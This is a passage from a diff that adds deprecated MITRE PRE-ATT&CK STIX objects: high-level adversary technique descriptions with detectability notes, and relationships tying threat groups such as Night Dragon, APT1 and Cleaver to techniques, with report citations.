service, the defender would not be aware.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to automate upload/email of a wide range of data packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1069", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9ac5715-ee5c-4380-baf4-6f12e304ca93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection for file upload/email filters", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1361).\n\nAn adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1361", + "external_id": "T1361" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Use of sites like [https://www.virustotal.com VirusTotal] to test signature detection often occurs to test detection. Defender can also look for newly added uploads as a precursor to an adversary's launch of an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Current open source technologies and websites exist to facilitate adversary testing of malware against signatures.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1138", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b3253d9e-ba11-430f-b5a3-4db844ce5413", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unauthorized user introduces compromise delivery mechanism", + "description": "**This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.**\n\nIf an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1387", + "url": "https://attack.mitre.org/techniques/T1387" + }, + { + "description": "Jeremy Kirk. (2008, December 16). Swedish Police Warn of Tampered Credit Card Terminals. Retrieved April 2, 2017.", + "source_name": "Credit Card Skimmers" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:28:39.840Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1164", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "This likely requires the adversary to have close or insider access to introduce the mechanism of compromise.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This varies depending on the amount of monitoring within the environment. Highly secure environments might have more innate monitoring and catch an adversary doing this more easily.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unconditional client-side exploitation/Injected Website/Driveby", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit's landing page. The exploit kit landing page will probe the victim's operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1372", + "url": "https://attack.mitre.org/techniques/T1372" + }, + { + "description": "Torsten George. (2014, October 15). The Internet's Big Threat: Drive-by Attacks. Retrieved March 7, 2017.", + "source_name": "GeorgeDriveBy" + }, + { + "description": "Lee Bell. (2013, January 8). Drive-by exploits are the top web security threat, says ENISA. Retrieved March 7, 2017.", + "source_name": "BellDriveBy" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:29:19.081Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1149", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Placing an exploit on a public web site for driveby types of delivery is not impossible. However, gaining access to a web site with high enough traffic to meet specific objectives could be the challenge.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "With the use of malware detonation chambers (e.g., for web or email traffic), this improves detection. Encryption and other techniques reduces the efficacy of these defenses.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Untargeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1370", + "url": "https://attack.mitre.org/techniques/T1370" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:30:45.039Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1147", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not fool proof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Upload, install, and configure software/tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).\n\nAn adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1362", + "external_id": "T1362" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + }, + { + "source_name": "RedOctober", + "description": "GReAT. (2013, January 17). \u201cRed October\u201d. Detailed Malware Description 4. Second Stage of Attack. Retrieved March 7, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1139", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Use multiple DNS infrastructures", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).\n\nA technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1327", + "external_id": "T1327" + }, + { + "source_name": "KrebsStLouisFed", + "description": "Brian Krebs. (2015, May 18). St. Louis Federal Reserve Suffers DNS Breach. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information. However, tracking multiple DNS infrastructures will likely require multiple tools/services or more advanced analytics.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires more planning, but feasible.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1104", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + }, + { + "id": "relationship--0adf353d-688b-46ce-88bb-62a008675fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used servers in China, the U.S., and the Netherlands in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "type": "relationship", + "modified": "2019-03-25T14:36:29.818Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used third party hosting services in the U.S. in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-03-25T14:36:29.820Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + }, + { + "id": "relationship--ef32147c-d309-4867-aaba-998088290e32", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + }, + { + "id": "relationship--e4501560-7850-4467-8422-2cf336429e8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f", + "relationship_type": "related-to", + "target_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05" + }, + { + "id": "relationship--db10491f-a854-4404-9271-600349484bc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but are used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "type": "relationship", + "modified": "2019-08-20T13:08:13.223Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "type": "relationship", + "modified": "2019-03-22T14:20:45.685Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + }, + { + "id": "relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + }, + { + "id": "relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + }, + { + "id": "relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + }, + { + "id": "relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe" + }, + { + "id": "relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + }, + { + "id": "relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05", + "relationship_type": "related-to", + "target_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f" + }, + { + "id": "relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "relationship_type": "related-to", + "target_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33" + }, + { + "id": "relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + }, + { + "id": "relationship--f43faad4-a016-4da0-8de6-53103d429268", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has used zhCat to encrypt traffic or use inline obfuscation to make detection more difficult. zhCat makes message traffic look benign.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "type": "relationship", + "modified": "2019-03-22T20:00:23.837Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used privately developed and customized remote access tools.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92", + "type": "relationship", + "modified": "2019-03-25T14:36:29.918Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "relationship_type": "related-to", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6" + }, + { + "id": "relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + }, + { + "id": "relationship--ab313887-ff00-4aa9-8edb-ab107c517c19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + }, + { + "id": "relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + }, + { + "id": "relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + }, + { + "id": "relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549" + }, + { + "id": "relationship--614f64d8-c221-4789-b1e1-787e9326a37b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) created biographical sections on TechNet profile pages to appear more legitimate.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T14:21:19.541Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) created fake LinkedIn profiles.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": 